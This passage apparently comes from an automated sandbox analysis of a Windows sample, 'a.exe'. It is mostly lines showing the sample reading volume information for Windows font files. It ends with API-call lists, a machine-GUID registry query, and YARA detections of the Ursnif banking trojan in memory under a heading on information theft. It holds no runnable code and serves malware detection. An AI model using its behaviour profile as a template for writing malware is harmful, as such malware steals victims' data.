            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\a.exeCode function: 4_2_0040140E GetSystemTime,SwitchToThread,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,CreateThread,GetLastError,QueueUserAPC,CloseHandle,GetLastError,TerminateThread,CloseHandle,SetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,4_2_0040140E
            Source: C:\Users\user\Desktop\a.exeCode function: 4_2_00401AFF CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,4_2_00401AFF
            Source: C:\Users\user\Desktop\a.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000004.00000003.462274472.0000000001B4C000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.362892848.0000000001D48000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.362944534.0000000001D48000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.363046153.0000000001D48000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.362984170.0000000001D48000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.362843477.0000000001D48000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.363021516.0000000001D48000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.363119118.0000000001D48000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.363077727.0000000001D48000.00000004.00000040.sdmp, type: MEMORY
